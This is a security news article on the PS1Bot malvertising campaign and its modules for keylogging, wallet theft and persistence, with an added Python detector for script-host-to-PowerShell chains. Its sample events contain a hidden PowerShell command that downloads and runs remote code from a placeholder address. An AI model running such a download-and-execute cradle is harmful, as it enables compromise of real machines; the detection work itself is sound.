Cybersecurity researchers have recently uncovered a new malvertising campaign targeting victims with a multi-stage malware framework known as PS1Bot. The framework is designed to perform a variety of malicious activities on infected systems, including information theft, keylogging, reconnaissance, and establishing persistent access.
According to Cisco Talos researchers, PS1Bot incorporates stealth techniques that minimize the traces it leaves on infected systems: its follow-on modules are executed in memory rather than written to disk. The malware has been active since early 2025, using malvertising and SEO poisoning as its primary propagation vectors.
The initial infection point comes through a compressed archive delivered to victims, which contains a JavaScript payload. This payload serves as a downloader that retrieves a PowerShell script from an external server, which is then executed on the infected machine.
The PowerShell script is the core of the chain: it connects to a command-and-control (C2) server to fetch subsequent commands. The malware's modules allow operators to carry out a range of actions, including:
- Antivirus Detection: Collecting and reporting installed antivirus programs on the infected system.
- Screen Capture: Taking screenshots from the infected device and sending the images back to the C2 server.
- Wallet Grabber: Stealing sensitive information from web browsers, cryptocurrency wallet applications, and files containing passwords or wallet seed phrases.
- Keylogger: Recording keystrokes and clipboard content.
- Information Collection: Gathering environmental data about the infected system to send to the attackers.
- Persistence: Creating scripts to ensure the malware runs again after system restarts.
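The infection chain described above (JavaScript downloader, then a PowerShell stage that fetches and runs follow-on code in memory) leaves a recognisable process-creation footprint. The following is an added detection example, not code from the Talos write-up; it assumes the JavaScript payload runs under Windows Script Host (wscript.exe/cscript.exe), that process events carry Sysmon-style pid/ppid/image/cmd fields, and it uses constructed sample events with a TEST-NET placeholder address.

```python
import re
from typing import Dict, List

# Processes that execute a .js payload and can spawn PowerShell (assumption: Windows Script Host).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Command-line fragments typical of a "fetch a script from a server and run it in memory" stage.
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-expression|\biex\b|-enc(odedcommand)?\b",
    re.IGNORECASE,
)

def basename(image: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return image.rsplit("\\", 1)[-1].lower()

def detect_js_to_powershell(events: List[Dict]) -> List[Dict]:
    """Flag PowerShell processes spawned by a script host and/or carrying a download cradle.
    Severity is 'high' when both indicators are present, 'medium' for one."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if basename(e["image"]) not in POWERSHELL:
            continue
        reasons = []
        parent = by_pid.get(e["ppid"])
        if parent and basename(parent["image"]) in SCRIPT_HOSTS:
            reasons.append(f"spawned by script host {basename(parent['image'])}")
        if CRADLE_RE.search(e["cmd"]):
            reasons.append("download/in-memory execution cradle in command line")
        if reasons:
            findings.append({"pid": e["pid"], "ppid": e["ppid"],
                             "severity": "high" if len(reasons) == 2 else "medium",
                             "reasons": reasons})
    return findings

# Constructed sample process-creation events (Sysmon Event ID 1 style, simplified).
SAMPLE_EVENTS = [
    {"pid": 412, "ppid": 300, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 520, "ppid": 412, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe "C:\Users\u\Downloads\invoice.js"'},
    {"pid": 611, "ppid": 520, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a')\""},
    {"pid": 700, "ppid": 412, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe Get-Process"},
]

if __name__ == "__main__":
    for finding in detect_js_to_powershell(SAMPLE_EVENTS):
        print(finding)
```

The benign interactive PowerShell launched from Explorer (pid 700) is not flagged, while the wscript.exe-to-PowerShell download cradle is reported at high severity.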
The information-stealer module uses a list of common words to target files that may contain passwords and cryptocurrency wallet seed phrases for exfiltration.
The campaign also shares technical similarities with AHK Bot, previously utilized by threat actors like Asylum Ambuscade and TA866. Additionally, it overlaps with earlier ransomware campaigns using a malware named Skitnet, aimed at data theft and remote system control.
On a related note, Google has announced efforts to combat invalid traffic by employing artificial intelligence systems that improve its ability to analyze app and web content, as well as ad placements, reducing fraudulent activity.